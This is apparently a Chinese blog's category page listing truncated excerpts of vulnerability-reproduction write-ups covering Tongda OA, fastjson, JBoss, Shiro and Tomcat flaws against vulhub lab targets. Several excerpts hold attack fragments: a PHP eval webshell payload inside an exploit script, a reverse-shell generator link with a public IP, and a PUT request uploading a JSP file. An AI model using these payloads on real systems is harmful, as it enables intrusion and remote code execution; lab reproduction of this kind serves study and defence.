
漏洞复现
文章平均质量分 67
复现及原理利用记录
梦之履行地
这个作者很懒,什么都没留下…
展开
-
靶场复现系列--vulnstack 4
一、前言也不知道是我运气差还是怎么回事,用vmw搭靶场就是搭不起来,遇到各种问题,后来换成virtual box后解决几个问题就可以了。第一个问题,虚拟机导入后网卡最好重新配下,不然容易报网卡的错误第二个问题,启动docker报错,web服务器(ubuntu)用户未加入docker组,将ubuntu用户加入docker组后,重启就可以通过docker构建容器了,下面是加入docker组的命令 sudo gpasswd -a ${USER} docker二、实践1.拓扑备注:这图片直接在靶场原创 2020-12-17 15:30:49 · 1861 阅读 · 0 评论 -
漏洞复现系列--通达OA v11.6版本RCE漏洞(2020hw期间0day)
一、影响版本 11.6二、复现过程1.下载11.6版本oa,下载地址:http://www.kxdw.com/soft/23114.html2.安装3.exp脚本import requeststarget="http://ip:port/" //此处填写上面安装oa的ip及端口payload="<?php eval($_POST['hahaha']);?>"print("[*]Warning,This exploit code will DELETE auth.i原创 2020-08-20 11:48:19 · 2701 阅读 · 5 评论 -
漏洞复现系列--fastjson<=1.2.47反序列化漏洞
1.利用条件fastjson <= 1.2.472.复现环境靶机:vulhub靶场攻击环境:一台公网vps,本地burp发送攻击数据包3.具体步骤1)docker起靶场进入到vulhub靶场1.2.47-rce目录环境下cd 1.2.47-rcedocker-compose up -d浏览器访问靶场环境如下2)反弹shell命令制作https://krober.biz/misc/reverse_shell.php?ip=122.51.255.154&port=94原创 2020-07-27 18:02:13 · 2218 阅读 · 0 评论 -
漏洞复现系列--JBOSS反序列化命令执行CVE-2017-12149
一、漏洞影响范围漏洞影响5.x和6.x版本的JBOSSAS二、复现过程1.1.1.1 公网vps,用来接收反弹的shell2.2.2.2 被攻击的jboss服务器1、复现环境用的vulhub,直接docker构建下就可以cd CVE-2017-12149docker compose up -d2、docker构建好以后,启动dockerdocker start 44a...原创 2020-05-08 15:40:18 · 388 阅读 · 0 评论 -
漏洞复现系列--通达OA未授权上传+文件包含RCE
一、漏洞情况此漏洞是由未授权上传和本地文件包含两个漏洞组合而形成的rce漏洞文件上传地址:http://localhost:8083/ispirit/im/upload.php本地文件包含地址:http://localhost:8083/ispirit/interface/gateway.php这个地址我看有的复现地址不一样,是/mac/gateway.php,可能和操作系统有关,需要...原创 2020-03-21 16:37:05 · 2922 阅读 · 2 评论 -
漏洞复现系列--Shiro RememberMe 1.2.4 反序列化漏洞
1、漏洞利用前提:Apache Shiro <= 1.2.42、靶场:利用vulhub的靶场在服务器上搭建注:docker相关配置就没有写了,靶场能运行就行靶场搭建git clone https://github.com/vulhub/vulhub.gitcd /vulhub/shiro/CVE-2016-4437docker-compose up -d #启动靶场启...原创 2020-02-05 20:25:16 · 2657 阅读 · 0 评论 -
漏洞复现系列--Tomcat-PUT方法任意文件写入(CVE-2017-12615)
1、漏洞利用前提:Tomcat版本: 7.0.0 - 7.0.81配置文件conf/web.xml中的readonly设置为false开启了PUT方法2、复现过程:用burp随意抓一个GET请求包,将GET改为PUT,并上传一个jsp文件PUT /1.jsp/ HTTP/1.1Host: 对应的网站hostAccept: */*Accept-Language: enUser-A...原创 2020-01-14 11:23:03 · 559 阅读 · 0 评论